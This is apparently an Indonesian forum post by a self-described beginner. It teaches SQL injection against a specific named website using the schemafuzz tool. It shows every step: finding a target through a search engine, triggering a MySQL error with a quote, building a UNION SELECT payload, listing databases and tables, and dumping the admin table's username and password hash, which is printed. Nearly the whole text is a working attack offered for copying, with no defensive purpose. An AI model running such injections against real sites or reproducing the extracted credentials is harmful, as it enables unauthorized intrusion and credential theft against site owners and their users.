Langsung menuju TKP saja deh, dari pada kelamaan.
Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
bagai mana menggunakannya bisa dibaca di banyak posting baik forum
maupun blog.
Bahan-bahan yang dibutuhkan;
1. Python
2. Schemafuzz
3. Koneksi Internet
4. Target Operasi.
-------------------------------------------------------
Langkah pertama tentu saja dengan membuka halaman search engine (my
fav is google)
disana kita mencari target dengan mengetikan kerword bebas sesuai
dengan feeling.
Kebetulan saya menemukan target bagus yaitu
http://dibekasi.net/banner_klik.php?id_bnr=37'
karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'' at line 1. Itu
adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.
Langkah kedua langsung menggunakan alat yaitu schemafuzz:
1. Schemafuzz.py -u "
http://dibekasi.net/banner_klik.php?id_bnr=31" --
findcol
untuk mengetahui column (angka ajaib yang digunakan untuk proses
injeksi)
maka akan muncul
http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26
itu digunakan untuk injeksi selanjutnya.
2. Schemafuzz.py -u "
http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --dbs untuk mengetahui semua database yang dipunyai oleh user
tersebut.
3. Untuk melihat table dan fieldnya semua di semua database
perintahnya:
Schemafuzz.py -u "
http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --full
nanti akan muncul table beserta field-fieldnya, seperti:
--cut--
[60]useradmin:
id_user,nama,username,password,level,user,del,welcome,logout
--cut--
4. Untuk melihat isi tablenya:
schemafuzz.py -u "
http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
-D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
--------------------------------------------------------------------------------------------------------
Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
menggurui tapi cuma mau share.
Buat yang ingin lebih tahu silahkan berdiskusi disini.
--------------------------------------------------------------------------------------------------------
NB :
Saya masih nyubi.
Best Regards
WoNX Always Newbie